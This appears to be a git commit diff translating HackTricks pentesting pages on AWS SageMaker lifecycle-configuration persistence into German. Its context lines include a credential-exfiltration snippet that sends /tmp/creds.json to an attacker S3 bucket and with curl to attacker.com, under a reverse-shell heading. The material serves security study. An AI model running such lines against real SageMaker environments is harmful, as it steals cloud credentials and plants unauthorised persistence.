Translated ['src/pentesting-ci-cd/ansible-tower-awx-automation-controlle

This commit is contained in:
Translator
2025-08-01 10:12:13 +00:00
parent 261da3a44c
commit 7ebe8a0caf
47 changed files with 473 additions and 291 deletions

View File

@@ -1 +1,3 @@
# AWS - Persistenz
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,4 +1,6 @@
# AWS - SageMaker Lifecycle Configuration Persistence
# Aws Sagemaker Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Übersicht der Persistenztechniken
@@ -21,7 +23,7 @@ sagemaker:UpdateUserProfile
sagemaker:UpdateSpace
sagemaker:UpdateDomain
```
## Set Lifecycle Configuration on Notebook Instances
## Lebenszykluskonfiguration für Notebook-Instanzen festlegen
### Beispiel AWS CLI-Befehle:
```bash
@@ -102,7 +104,7 @@ aws sagemaker create-studio-lifecycle-config \
```
### Kritische Informationen:
* Das Anfügen von LCCs auf Domain- oder Space-Ebene betrifft alle Benutzer oder Anwendungen im Geltungsbereich.
* Erfordert höhere Berechtigungen (sagemaker:UpdateDomain, sagemaker:UpdateSpace), die typischerweise auf Space-Ebene leichter umsetzbar sind als auf Domain-Ebene.
* Erfordert höhere Berechtigungen (sagemaker:UpdateDomain, sagemaker:UpdateSpace), die typischerweise auf Space-Ebene machbarer sind als auf Domain-Ebene.
* Netzwerkebenenkontrollen (z. B. strenge Egress-Filterung) können erfolgreiche Reverse Shells oder Datenexfiltration verhindern.
## Reverse Shell über Lifecycle-Konfiguration
@@ -153,4 +155,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
```
{{#include ../../../banners/hacktricks-training.md}}